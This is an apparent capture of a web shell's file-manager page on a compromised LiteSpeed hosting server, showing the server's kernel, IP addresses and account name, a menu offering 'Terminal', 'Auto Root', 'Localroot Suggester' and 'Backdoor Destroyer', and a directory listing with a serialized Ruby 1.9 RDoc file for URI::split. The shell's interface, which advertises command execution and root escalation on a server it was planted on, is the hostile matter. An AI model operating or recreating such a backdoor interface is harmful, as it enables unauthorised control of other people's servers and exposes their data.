Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.222
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
URI /
Delete
Unzip
Name
Size
Permission
Date
Action
BadURIError
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Error
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Escape
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
FTP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Generic
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
HTTP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
HTTPS
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
InvalidComponentError
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
InvalidURIError
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
LDAP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
LDAPS
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
MailTo
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Parser
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
REGEXP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
cdesc-URI.ri
4.6
KB
-rw-r--r--
2023-07-26 17:26
decode_www_form-c.ri
1.1
KB
-rw-r--r--
2023-07-26 17:26
decode_www_form_component-c.ri
423
B
-rw-r--r--
2023-07-26 17:26
encode_www_form-c.ri
1.45
KB
-rw-r--r--
2023-07-26 17:26
encode_www_form_component-c.ri
620
B
-rw-r--r--
2023-07-26 17:26
extract-c.ri
1016
B
-rw-r--r--
2023-07-26 17:26
join-c.ri
1.18
KB
-rw-r--r--
2023-07-26 17:26
parse-c.ri
969
B
-rw-r--r--
2023-07-26 17:26
regexp-c.ri
1.16
KB
-rw-r--r--
2023-07-26 17:26
scheme_list-c.ri
231
B
-rw-r--r--
2023-07-26 17:26
split-c.ri
906
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" split:EFI"URI::split;FT:publico:RDoc::Markup::Document:@parts[S:RDoc::Markup::Heading: leveli: textI" Synopsis;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"URI::split(uri) ;FS; ;i;I" Args;T@ o:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@labelI" +uri+;T; [o:RDoc::Markup::Paragraph; [I"String with URI.;T@ S; ;i;I"Description;T@ o;; [I"HSplits the string on following parts and returns array with result:;T@ o;; [I"* Scheme ;FI"* Userinfo ;FI"* Host ;FI"* Port ;FI"* Registry ;FI"* Path ;FI"* Opaque ;FI" * Query ;FI"* Fragment ;FS; ;i;I" Usage;T@ o;; [ I"require 'uri' ;FI" ;FI".p URI.split("http://www.ruby-lang.org/") ;FI"J# => ["http", nil, "www.ruby-lang.org", nil, nil, "/", nil, nil, nil];F: @file000[ I" (uri);TI"lib/uri/common.rb;T